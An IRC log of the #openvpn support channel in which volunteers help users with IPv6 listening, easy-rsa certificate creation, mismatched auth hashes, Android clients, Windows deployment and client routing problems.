imsmr but certainly not on 2.3 10:53 < pekster> No, not NAT6 at the ISP, but if the customer site gets no PD or too small of one, the site may feel compelled to NAT internally. That would be Bad™ 10:53 <@ecrist> yes, dlucio 10:54 <@ecrist> 2.2.2 essentially has no ipv6 support, 2.3.0 has nearly full ipv6 support 10:54 < dlucio> ok, tahts enough for me to push 2.3 into mga3 10:55 < dlucio> thank you :) 10:55 < pekster> /64 only, IIRC. 2.3.1 should should smaller sizes too, if you need/want that 10:55 < pekster> That in theory "should" be less of an issue, minus aforementioned bad ISPs ;) 10:55 < jzaw> what is the time scale for full ipv6 ecrist ie listen to 1194 on :: ? 10:55 <@ecrist> jzaw: 2.3.1 or so 10:56 <@ecrist> pekster: 2.3.0 supports variable subnets iirc 10:56 * jzaw rubs his hands with glee :) 10:56 <@ecrist> 2.2.0 would only allow /64 10:56 <@ecrist> jzaw: you can run a fully-ipv6 server now, though 10:56 < jzaw> oh? 10:56 < pekster> jzaw: I told you how to do that last night 10:56 <@ecrist> heh 10:56 * jzaw shakes his head from the fog that must have set in 10:57 < pekster> udp6 0 0 :::5001 :::* 10:57 <@ecrist> s/fog/drunk/ 10:57 < pekster> Just add --proto udp6 10:57 < jzaw> same thing ecrist eheh 10:57 < jzaw> pekster, i missed that ... sorry must have scrolled up on the screen 10:57 < pekster> Leave the 'local' option omitted and it'll listen on :::1194 (or in my example, 5001) 10:57 < jzaw> really ? ... must try now 10:57 < pekster> No, you replied to it. 10:58 < jzaw> oh ... forgive ... three sheets to the wind then ! 10:58 < Rienzilha> hmm, since there's activity here... What would be the easiest way to distribute a specific openvpn configuration with a software package (on windows). Have the installer put configuration and certificate in the openvpn configuration file directory and create a new tap device? 10:58 < jzaw> i replied? this is bad cos i cant remember 10:58 < pekster> Pretty sure. Unless your reply was in regard to something else 10:59 <@ecrist> Rienzilha: yes 10:59 <@EugeneKay> More booze 10:59 <@EugeneKay> Always more booze 10:59 < Rienzilha> and is there an easy way to check if openvpn is installed and up to date? 10:59 < pekster> openvpn --version perhaps? 10:59 < pekster> Or your package manager, or the repo links 10:59 < jzaw> pekster, i probably did reply but sometimes i have gaps 11:00 < Rienzilha> pekster: scripted, on a few hundred end user windows machines :) 11:00 < Poster> probably a login script would do it 11:00 < Poster> but that's less of an openvpn question and more of a windows administration question 11:01 < pekster> I've leveraged NSIS and Group Policy personally, but there are many wasy to do that 11:01 < pekster> Yup 11:01 < Rienzilha> well the user machiens are not part of any centralized something 11:01 < pekster> I just wrapped the OpenVPN installer (which is itself NSIS) inside my own NSIS installer to get all the bundled "site stuff" shipped too (scripts, keys, config, etc) 11:01 < Rienzilha> ah 11:01 < Poster> still a windows deployment process though 11:01 < Rienzilha> yeah it is 11:02 < Rienzilha> I'll try to figure it out 11:12 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has quit [Quit: Computer has gone to sleep.] 11:14 -!- star314 [~star314@xchg.fiss-oeaw.at] has joined #openvpn 11:18 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has joined #openvpn 11:20 < dlucio> is openvpn2.3 fully systemd aware? 11:20 -!- star314 [~star314@xchg.fiss-oeaw.at] has quit [Quit: Leaving] 11:21 * plaisthos does not even know what this means 11:22 <@plaisthos> proabably not 11:22 <@EugeneKay> No. 11:22 <@krzee> lol 11:22 <@EugeneKay> openvpn is a binary 11:22 <@krzee> I'm not systemd aware either 11:22 <@EugeneKay> Feel free to write a systemd-compatible init script 11:22 <@EugeneKay> It's a hipster initd 11:22 < dlucio> we have already, but i mean 11:22 < dlucio> i see that configure has --enable-systemd 11:23 <@plaisthos> it has? 11:24 <@plaisthos> oh yeah for querying password etc. via systemd 11:27 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has joined #openvpn 11:28 -!- pyrobisqit [~pyrobisqi@87.red-88-5-221.dynamicip.rima-tde.net] has quit [Ping timeout: 272 seconds] 11:30 -!- speed_racer8 [~speed_rac@c-98-196-168-201.hsd1.tx.comcast.net] has quit [Ping timeout: 272 seconds] 11:43 -!- speed_racer8 [~speed_rac@c-76-30-149-251.hsd1.tx.comcast.net] has joined #openvpn 11:53 -!- speed_racer8 [~speed_rac@c-76-30-149-251.hsd1.tx.comcast.net] has quit [Ping timeout: 260 seconds] 11:54 < dlucio> it seems that the easy-rsa scripts from2.2.2 has been disappeared 11:54 < dlucio> or are they renamed and in other path 11:55 < pekster> It's a separate project now 11:55 <@krzee> its a separate package now 11:55 < pekster> !easyrsa 11:55 < pekster> Hmm 11:55 <@krzee> !easy-rsa 11:55 <@vpnHelper> "easy-rsa" is (#1) easy-rsa is a certificate generation utility. or (#2) Download here: https://github.com/OpenVPN/easy-rsa/downloads or (#3) Download easy-rsa from git hub at https://github.com/OpenVPN/easy-rsa 11:55 < pekster> !learn easyrsa as [easy-rsa] 11:55 <@vpnHelper> Joo got it. 11:55 <@krzee> =] 11:55 < dlucio> jaaj ok, 11:56 <@krzee> ahh que hablas español 11:56 < dlucio> SI 11:56 < dlucio> P 11:56 <@krzee> :p 11:58 -!- pyrobisqit [~pyrobisqi@87.Red-88-5-221.dynamicIP.rima-tde.net] has joined #openvpn 11:58 < dlucio> is the openvpnfor android availabe at play store? 11:58 < dlucio> there has been an oepnvpn 2.1 package for a while there 11:59 <@krzee> !android 11:59 <@vpnHelper> "android" is (#1) an open source OpenVPN client for ICS is available in Google Play, look for OpenVPN for Android. FAQ is here: http://code.google.com/p/ics-openvpn/wiki/FAQ or (#2) If running cyanogenmod, openvpn and busybox are already installed for you! or (#3) If you do not have cyanogenmod or ICS, but your device is rooted, you can use android-openvpn-installer and openvpn-settings from the 11:59 <@vpnHelper> market 12:00 -!- speed_racer8 [~speed_rac@c-76-30-149-251.hsd1.tx.comcast.net] has joined #openvpn 12:03 < dlucio> the one from ARNE SCHWABE or from FRIEDRICH SCHÄUFFELHUT ?? 12:03 <@ecrist> look for openvpn connect 12:04 < dlucio> ha good 12:04 < dlucio> i found it 12:04 < dlucio> so, no rooted device :) 12:05 < dlucio> i have my phone rooted, but table , it isnot 12:05 < dlucio> tablet 12:06 <@ecrist> ICS+ you don't need root 12:08 <@plaisthos> dlucio: mine! d: 12:11 < dlucio> i will give i try, idont have any complain using theone that requires rooted anyway but if it is integrated as a services it is better 12:21 <@krzee> ecrist, you like openvpn connect more than openvpn for android? 12:21 <@ecrist> i've only used openvpn connect 12:21 <@krzee> i like the open source one better 12:21 <@ecrist> the other requires root, iirc, and I don't have a rooted device 12:21 <@krzee> no it doesn't 12:21 <@krzee> theres 2 no-root openvpn's for android 12:21 <@krzee> 1 is opensource, 1 is not 12:21 <@krzee> openvpn for android = open source and no root 12:21 <@krzee> openvpn connect = closed source and no root' 12:22 <@ecrist> krzee: openvpn connect will be open-sourced soon 12:22 <@krzee> android-openvpn-installer and openvpn-settings is when you have no ics so need root 12:22 <@krzee> plaisthos made openvpn for android 12:22 <@ecrist> I know... 12:22 <@krzee> aka arne schwabe 12:23 <@krzee> the friedrich one (fries) is the one that needs root 12:23 <@krzee> and openvpn connect is from openvpn technologies (when are they releasing that source?) 12:23 <@krzee> i didn't think they could because of the IOS app 12:24 <@ecrist> they can't release the iOS code itself 12:24 <@ecrist> the core openvpn code is to be released, though 12:24 <@krzee> right but they had to recode from scratch because of the IOS store rules 12:25 <@ecrist> no 12:25 <@krzee> thats what i understood at least' 12:25 <@ecrist> they recoded in C++ and changed a whole bunch of stuff, in large part, to save on battery life 12:26 <@ecrist> the re-code is basically just the client code, redone in c++ (like the openvpn-as client) 12:26 -!- Keshl [~Purple@24.115.178.18.res-cmts.gld.ptd.net] has joined #openvpn 12:27 <@krzee> right i understand that part, but could have sworn i was told in a meeting that it was recoded for IOS store rules and thats why the source was closed even on android 12:27 <@krzee> that the apple store is incompat with opensource 12:27 <@krzee> (licensing that is) 12:28 <@ecrist> that's why the iOS client won't be open sourced 12:28 -!- Sidewinder [~de@unaffiliated/sidewinder] has quit [Quit: Leaving] 12:31 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has joined #openvpn 12:34 <@krzee> i still like openvpn for android :D 12:34 <@ecrist> heh 12:34 <@ecrist> I have nothing against it, just never tried it 12:34 <@krzee> it existed a bit before openvpn connect 12:34 <@krzee> so i got used to it early 12:35 <@krzee> i love it, it's everything i would have wanted 12:37 < pekster> I haven't (yet) gotten into android development, but I suppose I'll get there soon enough; I already have the SDK on 2 of my computers for the purposes of rooting and assorted adb tasks 12:43 -!- vraa__ [~speed_rac@c-76-30-149-251.hsd1.tx.comcast.net] has joined #openvpn 12:45 -!- speed_racer8 [~speed_rac@c-76-30-149-251.hsd1.tx.comcast.net] has quit [Ping timeout: 260 seconds] 12:47 -!- Keshl [~Purple@24.115.178.18.res-cmts.gld.ptd.net] has quit [Read error: Connection reset by peer] 12:47 -!- Keshl [~Purple@24.115.178.18.res-cmts.gld.ptd.net] has joined #openvpn 12:50 < Keshl> Does anyone have a few minutes to point me in the right direction? I've got a log of a connection that's being reset as soon as I connect. It seems to actually succeed and get an IP, but as soon as it does the server just resets the connection. I'm not sure what might be wrong in my configuration, but here's the log: http://pastebin.com/7xGy7Bwi 12:53 <@EugeneKay> Other end's log? 12:53 < Keshl> Good question. ... How do I get that, exactly? I've got it running on dd-wrt. Dunno where that actually /goes/... 12:54 -!- Keshl [~Purple@24.115.178.18.res-cmts.gld.ptd.net] has quit [Read error: Connection reset by peer] 12:54 -!- Keshl [~Purple@24.115.178.18.res-cmts.gld.ptd.net] has joined #openvpn 12:55 < Keshl> Sorry. Hiccuped. <.< 12:56 <@EugeneKay> Bugger if I know, I don't use ddwrt :-p 12:56 < Keshl> Okay, where is it usually on most Linux systems, then? Might get lucky. 12:57 <@EugeneKay> syslog 12:57 <@EugeneKay> Or wherever --log is 12:57 < Keshl> oh, there it is. 12:57 < Keshl> Yeah got it, one moment. 12:58 < Keshl> http://pastebin.com/A59nqxHA 12:58 <@EugeneKay> The most obvious problem is v2.3.0 vs v2.1.3 12:58 <@EugeneKay> It /oughta/ work, but no guarantees. 12:58 < Keshl> Ohhh.. 12:58 < Keshl> Well, might as well give 2.1.3 a whirl. 13:00 <@EugeneKay> !configs 13:00 <@vpnHelper> "configs" is (#1) please pastebin your client and server configs (with comments removed, you can use `grep -vE '^#|^;|^$' server.conf`), also include which OS and version of openvpn. or (#2) dont forget to include any ccd entries or (#3) on pfSense, see http://www.secure-computing.net/wiki/index.php/OpenVPN/pfSense to obtain your config 13:01 < pekster> HMAC auth failed? Did you forget a --tls-auth on one side, or not use the same shared key at both ends? 13:03 <@EugeneKay> that'd fail soonr 13:03 < pekster> Oh, nevermind; it's partway through the handshake. Maybe incorrect --auth used though 13:04 < pekster> SHA512 isn't the default (SHA1 is) so both sides would explicitly need it defined 13:04 <@EugeneKay> Yeah, especially as the client says SHA1 13:04 <@EugeneKay> Er no, server 13:04 < Keshl> One thing at a time o_o I'm new to this. Trying 2.1.3 first. 13:05 < uberushaximus> That's what she said 13:05 < pekster> fwiw, I just use SHA256 since it's not really any less secure and saves some overhead, but that's just me 13:05 -!- uberushaximus was kicked from #openvpn by EugeneKay [innanuts] 13:05 < Keshl> uuuppz: Nice.. XD 13:05 -!- uberushaximus [~uberushax@hacked.thegov.us] has joined #openvpn 13:05 <@krzee> hah 13:05 < uberushaximus> <3 EugeneKay 13:05 < Keshl> 2.1.3, works happil;y! 13:05 * Keshl huggles! 13:05 < Keshl> Sort of. 13:05 <@EugeneKay> Well, there you go then? :v 13:05 <@krzee> no hmac error with 2.1.3? 13:06 < Keshl> It says it got an IP, but it still says "connecting" and the icon's yellow, not green. 13:06 <@EugeneKay> I think configs would help :-p 13:06 < Keshl> ...Indeed, looking at the log now it's doing the same thing as before <ω< 13:06 <@krzee> its what pekster said 13:06 <@krzee> tls-auth mismatch on files or config options 13:07 < Keshl> Lemme check that first then. I'll bother'ya more if it still yells at me. 13:08 < Keshl> Blah. <.< Okay this is over my head. I think it's the fact dd-wrt's making me use a GUI rather than just being simple and typing the config like everyone else. 13:09 < Keshl> Where is the file normally stored on Linux? 13:09 < pekster> /etc/openvpn/config-name.conf although you can really store it anywhere you like 13:09 < robert_> http://pastebin.com/jYGGvt9C -- I'm getting lots of "MULTI: bad source address from client [], packet dropped" between openwrt and a openvpn server my colleague and I are setting, up and I don't know why. :/ 13:09 < pekster> I just wrote my own bare-bones initscript for openwrt since I dislike the "config file integration" $upstream does 13:09 < Keshl> Least it gives me something to go off of. 13:09 <@EugeneKay> Blah, gUI 13:10 < robert_> an* openvpn ** 13:10 -!- krzee [nobody@openvpn/community/support/krzee] has left #openvpn ["Leaving"] 13:10 <@EugeneKay> robert_ - that usually means that there's a route one side has that the other isn't expecting 13:10 -!- Keshl [~Purple@24.115.178.18.res-cmts.gld.ptd.net] has quit [Read error: Connection reset by peer] 13:10 -!- krzee [nobody@hemp.ircpimps.org] has joined #openvpn 13:10 -!- krzee [nobody@hemp.ircpimps.org] has quit [Changing host] 13:10 -!- krzee [nobody@openvpn/community/support/krzee] has joined #openvpn 13:10 -!- mode/#openvpn [+o krzee] by ChanServ 13:10 <@EugeneKay> So openvpn drops the unknown traffic 13:10 < pekster> Keshl: This is not very refined (early dev version right out of my source control) but maybe you can tune this to work on dd-wrt if you'd like: http://pekster.sdf.org/code/files/openvpn.init.devel 13:10 -!- Keshl [~Purple@24.115.178.18.res-cmts.gld.ptd.net] has joined #openvpn 13:11 < robert_> EugeneKay: ah. and afternoon, btw. :D 13:11 < robert_> EugeneKay: would the server configuration help? 13:12 <@EugeneKay> Meh, I don't feel like pawing through routes 13:12 <@EugeneKay> Even if I am wearing my OpenVPN shirt today 13:12 <@krzee> lol 13:12 <@krzee> wore mine 2 days ago :D 13:12 -!- kyrix [~ashley@85-126-76-82.work.xdsl-line.inode.at] has quit [Quit: Ex-Chat] 13:12 <@EugeneKay> It's covered in cat hair now :-/ 13:12 < uberushaximus> :\ 13:12 <@krzee> furballs 13:13 < uberushaximus> flippin cats 13:13 <@EugeneKay> It's a lady-friend's 13:13 <@krzee> hair or cat? 13:13 < uberushaximus> awwwww yeeeah 13:13 <@EugeneKay> Cat 13:14 <@EugeneKay> her hair too, but that's a lot less oppressing 13:14 < Keshl> pekster: Ain't finding it. Best I got is a screenshot of the GUI: http://ompldr.org/vaHR1bw/server.jpg . Client is http://pastebin.com/Sh4LqdT9 -- I tried changing the cipher to 128 on the server, which seems to make it hold longer but it still does the same thing. When I change it client-side, it appears right away with a "failed to connect" popup. 13:15 < Rienzilha> hmm, can one launch an openvpn session without being bothered by a uac prompt? 13:15 < Keshl> Rienzilha: Sure. Disable UAC. 13:15 < Keshl> (Otherwise, no) 13:15 <@EugeneKay> You can right click the icon and hit Disconnect 13:15 < Rienzilha> *sigh* 13:16 < pekster> Keshl: cipher isn't your problem. Your logs from earlier show one side using SHA1 and the other SHA512 as your hash choice. This is an error: they must match 13:16 <@EugeneKay> It'll relaod the conf when you click Connect 13:16 <@EugeneKay> If you really want you can run it as a Windows service, but then you lose the icon 13:16 < Keshl> pekster: Oh. How do I change that, then? Client-side, preferably? There's appearntly no easy way to do it server-side. 13:16 < pekster> Rienzilha: That's the point of UAC: openvpn requires admin rights, and UAC confirms before you grant such a program rights to run as an admin (even if you "are" an admin user) 13:16 < pekster> Keshl: --auth in the manpage 13:17 < Rienzilha> pekster: I know why uac exists, but some applications are able to elevate automatically 13:17 < pekster> Use whatever hash you want, but they must match 13:17 <@EugeneKay> Though i know there is a hacky program to bypass UAC for certain apps 13:17 < Keshl> x.x There an online manual? I'm on Windows here. 13:17 < Rienzilha> but that probably needs expensive microsoft application signatures and what not 13:17 <@EugeneKay> Look up ElevatedShortcut 13:17 < pekster> Rienzilha: You mean prompt you automatically? No application should ever "become" an admin without prompting, less it's a service and not an actual program 13:18 < Rienzilha> pekster: no I mean gain elevated priviliges without prompting 13:18 < pekster> If you mean automatically prompt you so you don't have to "run as admin" that's been disscucsed 13:18 < pekster> Then turn UAC off? 13:18 < Rienzilha> what I need is the following 13:18 < pekster> Or use a solution like EugeneKay suggested (I'd guess it just elevates once and then runs child processes under its own admin rights) 13:18 < Rienzilha> I have an application that needs to establish an openvpn connection on launch (and ideally kill it on exit) 13:19 <@EugeneKay> It uses a special binary which is marked in Windows to not need UAC 13:19 <@EugeneKay> It's a filthy hack 13:20 < Rienzilha> users ideally shouldn't be bothered with uac prompts every time they launch, but if there is no way to accomplish that i'll bother them with uac prompts :) 13:20 < pekster> So, you want UAC to stop things from automatically running with system admin rights, but you don't want to prompt users? 13:20 < pekster> Security or one-click operation: pick one :) 13:21 < Rienzilha> well there is quite some applications that can 13:21 < uberushaximus> what is NT security 13:21 <@EugeneKay> There's a setting to have UAC not prompt for Windows binaries 13:21 < Rienzilha> trusted applications can elevate without prompt 13:22 < Rienzilha> and the prompts don't work for most users anyway, since most people will click anything if needed :) 13:22 < robert_> anybody else? All I need is to fix this, and then I'll be out of everybpdy's hair. :p 13:23 < Keshl> pekster: I tried putting "auth SHA512" and "auth SHA1" in the client config. Checked the logs, the change did take. Same issue regardless. 13:23 < pekster> "Same issue"? It should be a "different issue" if you fixed your hash to match 13:23 < pekster> You don't need to try both settings: you need to match between your endpoints 13:24 < Keshl> It still does the same thing. Resets after it connects. Icon keeps changing from green to yellow and back over and over. 13:24 < pekster> That's not helpful 13:24 < pekster> I can tell you from that description that "it isn't working." 13:25 < Keshl> pekster: My bad. And thanks, there's another setting I didn't notice that ain't matching that I didn't catch. 13:25 < Keshl> ...Oh. Ohhh, that's, what's happening.. The GUI needs me to hit "save" then "apply". <.< Can't just hit "apply" 13:26 < Keshl> Heeeeey now it works! Thanks. -huggles at.- 13:26 < pulz> i got a openvpn client behind a nat router with an active portforward, when i start openvpn the portforward stops responding, any suggestions on how to handle this ? 13:28 < pekster> pulz: I'm guessing you're using the --redirect-gateway option, or otherwise pushing a route that interferes with the reply traffic 13:29 < pekster> If so, your choices include 1) stop using gateway redirection, 2) exclude the source of traffic you wish to forward by a route to your pre-existing gateway, or 3) set up policy routing 13:29 < pulz> pekster: my gues was correct then i see, manual pusing of gateways ? 13:30 < pekster> Is that a question? 13:33 < pulz> no, thank you for the pointers, will look into it 13:34 -!- krzee [nobody@openvpn/community/support/krzee] has quit [Read error: Connection reset by peer] 13:38 -!- Keshl [~Purple@24.115.178.18.res-cmts.gld.ptd.net] has quit [Read error: Connection reset by peer] 13:38 -!- Keshl [~Purple@24.115.178.18.res-cmts.gld.ptd.net] has joined #openvpn 13:40 -!- Six6siX [~six6six@cpc2-ely06-2-0-cust377.5-1.cable.virginmedia.com] has joined #openvpn 13:40 < Six6siX> Hello people 13:41 < Six6siX> I have a problem with openvpn, i can connect to the server fine, i can surf the internet fine.. however if I log on using my iphone it knocks my laptop off the net. 13:41 < Six6siX> how would I get openvpn to assign multiple Ip's to each device? 13:42 < pekster> !duplicate 13:42 <@vpnHelper> "duplicate" is the option duplicate-cn is for allowing the same cert to login more than once. It should not be used in most situations, with main exceptions being if you also use !authpass or if just testing 13:42 < Six6siX> oh 13:42 < rob0> best answer: make another certificate for the other client 13:42 < pekster> The correct way to do what you want is issue different certs to each device 13:42 < Six6siX> ah 13:43 < Six6siX> does this mean I have to run ./clean-all? 13:43 < pekster> No, that will wipe out your PKI 13:43 < Six6siX> oh 13:43 * Six6siX is a n00b 13:43 < pekster> Never run that unless you really want to start over with a new CA. You can generate a new keypair and sign it with the build-req script 13:44 < Six6siX> okay so which order do i do this? ./build-server-key then ./build-key followed by build-dh? 13:44 < pekster> Do you already have a server key and dh params? 13:44 < Six6siX> yea 13:45 < rob0> ./build-server-key ? Why 13:45 < pekster> Those are one-time operations, and you don't need to do them again 13:45 < Six6siX> oh okay 13:45 < pekster> Unless you want to authorize a new server, or re-generate your DH params for some reason 13:45 < Six6siX> no server is all working fine.. all i need is another client cert for my laptop 13:45 < pekster> Just create a new key (build-key, that's what I was looking for. My brain is too deep on the next version of easy-rsa I'm coding) 13:45 < Six6siX> ah okay 13:45 < Six6siX> awesome 13:46 < pekster> It's possible to generate your keypairs on thte client device, send the req to the CA system for signing, and send the cert back, but that might be more than you want to deal with now. It's better security to do it that way, but you can add "best practices" later if you want to learn more after a working setup 13:46 < Six6siX> just got a an error saying i need to source ./vars is this safe? 13:47 < pekster> Yes, you need to source vars each time you call easy-rsa from a new shell session 13:47 < Six6siX> okay cool 13:47 < pekster> Just ". ./vars" in your dir 13:47 < pekster> It just sets some env-vars 13:48 < rob0> envelope varsity 13:48 < Six6siX> awesome.. saved me from a load of hassle the fella's.. 13:48 < Six6siX> there* 13:49 < rob0> pekster, did you look at my lousy reimplementation of easy-rsa? I recently fixed it (it had been horribly broken.) 13:50 < pekster> No, I ended up starting basically from scratch on some redesign 13:50 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has quit [Ping timeout: 245 seconds] 13:50 < pekster> I've got a new round of changes to make manually sourcing the config unnecessary, but you can check out what I've got now at: https://github.com/QueuingKoala/easy-rsa 13:50 <@vpnHelper> Title: QueuingKoala/easy-rsa · GitHub (at github.com) 13:50 < pekster> I've completely updated the OpenSSL config and operation too 13:50 < pekster> By default, no more silly "org/city/state/OU" cruft :) 13:51 < rob0> good 13:51 < pekster> And I'm making it easy to remove (and may make it the default, I'm not sure yet, to omit the "Netscape" extensions too) 13:51 < pekster> Sugggestsions welcome (here or -devel as you like) although I'm aware the sourcing business isn't exactly friendly. A solution is already in the works to fix that, and even run "configless" if desired 13:52 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has joined #openvpn 13:54 -!- pyrobisqit [~pyrobisqi@87.Red-88-5-221.dynamicIP.rima-tde.net] has quit [Read error: Connection reset by peer] 13:56 -!- vraa__ [~speed_rac@c-76-30-149-251.hsd1.tx.comcast.net] has quit [Ping timeout: 246 seconds] 13:59 -!- Six6siX [~six6six@cpc2-ely06-2-0-cust377.5-1.cable.virginmedia.com] has quit [Ping timeout: 260 seconds] 14:05 -!- robert___ [~hellspawn@static-96-254-212-18.tampfl.fios.verizon.net] has joined #openvpn 14:05 -!- robert___ [~hellspawn@static-96-254-212-18.tampfl.fios.verizon.net] has quit [Changing host] 14:05 -!- robert___ [~hellspawn@objectx/robert] has joined #openvpn 14:05 -!- mikkel [~mikkel@80-71-132-15.u.parknet.dk] has joined #openvpn 14:08 -!- robert_ [~hellspawn@objectx/robert] has quit [Ping timeout: 258 seconds] 14:08 -!- pyrobisqit [~yaaic@87.Red-88-5-221.dynamicIP.rima-tde.net] has joined #openvpn 14:08 -!- robert_ [~hellspawn@static-96-254-212-18.tampfl.fios.verizon.net] has joined #openvpn 14:08 -!- robert_ [~hellspawn@static-96-254-212-18.tampfl.fios.verizon.net] has quit [Changing host] 14:08 -!- robert_ [~hellspawn@objectx/robert] has joined #openvpn 14:09 -!- pyrobisqit__ [~pyrobisqi@87.Red-88-5-221.dynamicIP.rima-tde.net] has joined #openvpn 14:09 -!- pyrobisqit__ [~pyrobisqi@87.Red-88-5-221.dynamicIP.rima-tde.net] has quit [Read error: Connection reset by peer] 14:09 -!- pyrobisqit_ [~pyrobisqi@87.Red-88-5-221.dynamicIP.rima-tde.net] has joined #openvpn 14:10 -!- pyrobisqit [~yaaic@87.Red-88-5-221.dynamicIP.rima-tde.net] has quit [Client Quit] 14:10 -!- robert___ [~hellspawn@objectx/robert] has quit [Ping timeout: 256 seconds] 14:10 -!- pyrobisqit_ [~pyrobisqi@87.Red-88-5-221.dynamicIP.rima-tde.net] has quit [Client Quit] 14:10 -!- pyrobisqit [~pyrobisqi@87.Red-88-5-221.dynamicIP.rima-tde.net] has joined #openvpn 14:11 -!- pyrobisqit [~pyrobisqi@87.Red-88-5-221.dynamicIP.rima-tde.net] has quit [Client Quit] 14:12 -!- pyrobisqit [~pyrobisqi@87.Red-88-5-221.dynamicIP.rima-tde.net] has joined #openvpn 14:13 -!- robert_ [~hellspawn@objectx/robert] has quit [Ping timeout: 255 seconds] 14:16 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has quit [Read error: Connection reset by peer] 14:21 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has joined #openvpn 14:25 -!- speed_racer8 [~speed_rac@c-76-30-149-251.hsd1.tx.comcast.net] has joined #openvpn 14:27 -!- raidz [~raidz@openvpn/corp/admin/andrew] has quit [Read error: Connection reset by peer] 14:28 -!- raidz [~raidz@openvpn/corp/admin/andrew] has joined #openvpn 14:28 -!- mode/#openvpn [+o raidz] by ChanServ 14:29 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has quit [Quit: Computer has gone to sleep.] 14:35 -!- hrenovo [~hrenovo@li469-37.members.linode.com] has joined #openvpn 14:35 -!- Six6siX [~six6six@cpc2-ely06-2-0-cust377.5-1.cable.virginmedia.com] has joined #openvpn 14:36 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has quit [] 14:36 < hrenovo> hi guys. I am stuck on something silly. I have 4 clients connected to the server, and I can ping the server from each client, but I cannot ping any client. I tried this test with firewal completely turned off on the client but no luck. 14:36 < hrenovo> also, I have client-to-client directive in server.conf 14:36 < hrenovo> ideas ? Thanks in advance. 14:37 -!- Six6siX_ [~six6six@cpc2-ely06-2-0-cust377.5-1.cable.virginmedia.com] has joined #openvpn 14:37 < pekster> Can't ping from the server to the client? 14:37 < Six6siX_> hey fellas, back again.. with another problem.. 14:37 < hrenovo> pekster: thats right 14:37 < pekster> If so, it is certainly a firewall issue. The reply ping goes back fine, so openvpn and routing are working normally 14:37 < hrenovo> pekster: can't ping client to client either 14:37 < pekster> Despite your assertation that it's not a firewall, it is 14:38 < hrenovo> pekster: I tried it with firewall turned off on the client 14:38 < Six6siX_> i built the keys earlier.. and im now unable to connect to the server.. It just disconnects without any errors... however my suspicions are when i built my keys it gave me an error "unable to update databse TXT_DB error number 2" 14:39 < pekster> Six6siX_: Sounds like you didn't use a unique CN 14:39 < Six6siX_> o_O 14:39 < pekster> IIRC that's the error you get. The CN (Common Name) of the certificate must be unique 14:39 < Six6siX_> oh... 14:39 < pekster> It's used to uniquely identify each certificate. They may not match, and the error you got is openssl refusing to add it 14:40 < Six6siX_> I named the key laptop.. and there wasnt any keys named laptop at the time 14:41 -!- Six6siX [~six6six@cpc2-ely06-2-0-cust377.5-1.cable.virginmedia.com] has quit [Ping timeout: 258 seconds] 14:41 < pekster> hrenovo: Again, if the ping from clien tto server works, there is by definition a reply packet (the echo-reply) that is getting sent back. openvpn is doing exactly what it's supposed to. tcpdump traffic starting on your server for the ping, and check your firewalls again 14:42 -!- benkay [~benkay@67.50.19.230] has joined #openvpn 14:43 < benkay> what do I need to know about setting up a CA with pkitool vs build-ca? 14:43 < benkay> !welcome 14:43 <@vpnHelper> "welcome" is (#1) Start by stating your goal, such as 'I would like to access the internet over my vpn' || new to IRC? see the link in !ask || we may need !logs and !configs and maybe !interface to help you. || See !howto for beginners. || See !route for lans behind openvpn. || !redirect for sending inet traffic through the server. || Also interesting: !man !/30 !topology !iporder !sample !forum 14:43 <@vpnHelper> !wiki !mitm or (#2) Don't use 192.168.1.0/24 or 192.168.0.0/24 (too much potential for conflict) 14:43 < hrenovo> pekster: firewall on the client? 14:43 < benkay> !goal understand differences between pkitool and build-ca 14:45 < pekster> Firewall at either end 14:45 < pekster> Hence tracing the packet 14:46 < pekster> Follow the flow of data, starting at the end sending it 14:46 < pekster> It would be possible (although odd) to have configured a server to drop outbound requests to a client, for instance 14:47 < rob0> except --client-to-client bypasses the OS firewall 14:47 < pekster> He's having issues getting from the server to the client 14:47 < pekster> Still think that'll hit filter/OUTPUT 14:47 < pekster> Among the usual mangle/nat tables 14:47 < rob0> server to client could, yes 14:47 < pekster> (on Linux, anyway) 14:47 < rob0> client to client can't be a server firewall with --client-to-client 14:48 < pekster> benkay: build-ca and the other scripts are just frontends. pkitool in Easy-RSA 2.x does all the real work 14:48 < benkay> thanks pekster! 14:48 -!- Six6siX [~six6six@jasmine1.sammybakar.com] has joined #openvpn 14:48 < Six6siX> thank you pekster 14:49 < Six6siX> i've rebuilt the key with a unique name 14:49 < Six6siX> and it works 14:49 < pekster> Great 14:51 -!- Six6siX_ [~six6six@cpc2-ely06-2-0-cust377.5-1.cable.virginmedia.com] has quit [Ping timeout: 258 seconds] 14:53 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has joined #openvpn 14:53 < benkay> when I run ./clean-all, I'm told to source ./vars first 14:53 < benkay> except that I already have 14:54 < benkay> confus! 14:55 < rob0> do you know what ./clean-all does? If you had a PKI, now you don't. 14:55 < benkay> yup! i do. 14:55 < benkay> my solution, if anyone cares at a later date, was to sudo -s and then source ./vars 14:56 < benkay> this is necessary because source is a bash command 14:56 < benkay> `sudo -s`, `source ./vars` 14:56 < rob0> um, there should be no need to sudo, just run the commands as the user who owns the PKI files. 14:58 < rob0> in fact, you probably do NOT want your CA/PKI to be owned by root. 14:58 < benkay> I can see how that would be a good idea. 14:58 < benkay> so, I'm setting up the PKI for the first time 14:58 < pekster> There's no reason Easy-RSA (or the openssl tool it calls to do the backend work) does not need to be run as root. You should not run things as root unless you need to (this is a Unix mentality) 14:59 < pekster> Erm, no reason it does need to be run as root 14:59 < rob0> yeah, no problem to blow it away a few times while playing around :) 15:00 < pekster> I create a role account to handle my PKI tasks, and all the files are mode 600 (or 700 for scripts.) No other user can view the files besides that account (and technically root, but root doesn't own or run any of my PKI scripts) 15:00 -!- Six6siX [~six6six@jasmine1.sammybakar.com] has quit [Ping timeout: 256 seconds] 15:00 < rob0> Another tip: if possible, your CA key and PKI files should not be on the VPN server. 15:00 < rob0> (Ideally not on the VPN at all.) 15:00 < benkay> thanks, rob0 15:00 < rob0> 